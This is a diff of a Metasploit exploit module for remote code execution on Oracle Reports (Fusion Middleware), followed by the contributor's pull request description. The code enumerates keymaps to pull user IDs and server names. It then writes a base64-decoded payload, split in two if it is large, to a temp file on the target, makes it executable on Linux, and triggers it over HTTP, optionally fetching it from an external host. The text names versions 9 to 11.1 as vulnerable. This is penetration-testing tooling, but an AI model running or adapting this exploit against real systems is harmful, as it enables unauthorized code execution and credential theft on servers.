-    shell += " byte [] pl = decoder.decodeBuffer(\"#{encoded_pl}\");"
     #correct file suffix if windows
     if datastore['TARGET'] == 1
       shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".exe\");"
@@ -237,9 +217,23 @@ class Metasploit3 < Msf::Exploit::Remote
       shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".tmp\");"
     end
     shell += " String path = temp.getAbsolutePath();"
-    shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"
-    shell += " ou.write(pl);"
-    shell += " ou.close();"
+    if big_payload
+      shell += " byte [] pl = decoder.decodeBuffer(\"#{pl_first}\");"
+      shell += " byte [] pltwo = decoder.decodeBuffer(\"#{pl_second}\");"
+
+      shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"
+      shell += " ou.write(pl);"
+      shell += " ou.close();"
+
+      shell += " ou = new BufferedOutputStream(new FileOutputStream(path, true));"
+      shell += " ou.write(pltwo);"
+      shell += " ou.close();"
+    else
+      shell += " byte [] pl = decoder.decodeBuffer(\"#{encoded_pl}\");"
+      shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"
+      shell += " ou.write(pl);"
+      shell += " ou.close();"
+    end
     #correct rights if linux host
     if datastore['TARGET'] == 0
       shell += " Process p = Runtime.getRuntime().exec(\"/bin/chmod 700 \" + path);"
@@ -252,14 +246,18 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exec_payload
-    if @hacked
-      print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
-      print_status("#{peer} - Executing payload...")
+    print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
+    print_status("#{peer} - Executing payload...")
 
-      res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
-        'method' => 'GET'
-      })
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200
+       print_good("#{peer} - Payload executed!")
+    else
+       print_status("#{peer} - Payload execution failed")
     end
   end
 end

--- a/modules/exploits/multi/http/oracle_reports_rce.rb
+++ b/modules/exploits/multi/http/oracle_reports_rce.rb
@@ -60,8 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
     ))
     register_options(
       [
-        OptString.new('EXTURL', [false, 'An alternative host to request the payload from', "" ]),
-        OptString.new('PAYDIR', [false, 'The folder to download the payload to', "/examples/" ]),
+        OptString.new('EXTURL', [false, 'An external host to request the payload from', "" ]),
+        OptString.new('PAYDIR', [true, 'The folder to download the payload to', "/examples/" ]),
+        OptString.new('ALTPATH', [false, 'Skip enumeration and use this known local path', ""]),
         OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
       ])
   end
@@ -93,31 +94,41 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if res and res.body.include?("Reports Services")
-      test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
+      #skip enum for known localpath?
+      if datastore['ALTPATH'].blank?
+        test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
 
-      #Parse keymaps for servers
-      print_status "#{peer} - Enumerating keymaps ... "
-      test.each do |t|
-        if not @hacked
-          t = t.delete(' ')
+        #Parse keymaps for servers
+        print_status "#{peer} - Enumerating keymaps ... "
+        test.each do |t|
+          if not @hacked
+            t = t.delete(' ')
 
-          res = send_request_cgi({
-            'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
-            'method' => 'GET',
-          })
+            res = send_request_cgi({
+              'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
+              'method' => 'GET',
+            })
 
-          if res and res.code == 200
-            if res.body =~ /userid=(.*)@/
-              authid = $1
+            if res and res.code == 200
+              if res.body =~ /userid=(.*)@/
+                authid = $1
+              end
+              if res.body =~ /server=(\S*)/
+                server = $1
+              end
             end
-            if res.body =~ /server=(\S*)/
-              server = $1
+            if server and authid
+              #remove potential leftovers
+              authid = authid.gsub("\"", "")
+              server = server.gsub("\"", "")
+              getenv(server, authid)
             end
-          end
-          if server and authid
-            getenv(server, authid)
           end
         end
+      else
+        print_status "#{peer} - Skipping enumeration and using supplied local path"
+        @local_path = datastore['ALTPATH']
+        setup_payload
       end
     else
       fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")


### PR DESCRIPTION
I had a couple of hours over and I figured I'd metasploitfy my original ruby one. 

That being said, theres stuff to be done plus testing is hard because I don't have any of the older Oracle Fusion Middleware versions. So if someone or some people wants to help out testing or send me older versions, feel free, mattias@gotroot.eu  

Vulnerable versions are primarily 11.1 but also 9 and 10 if unpatched.

The code itself as mentioned has some stuff that has to be fixed:
+send_request_cgi and raw, I can't get it to output the full get response (showmap and showenv reponses are huge) so i had to resort to using open-uri to produce this. Any ideas about this would be great, I'm probably missing something obvious.
+payload can be changed to embed a meterpreter in a .jsp, easily fixed, will do this.
+overall code cleanup and testing of for example the local server when not using an external url to deliver the payload.

I have tested it on Linux with version 11.1 but i don't have that possibility anymore and would as mentioned either need help to test or if someone could hand me some copies.

Eitherway it 'works' but needs polish and testing
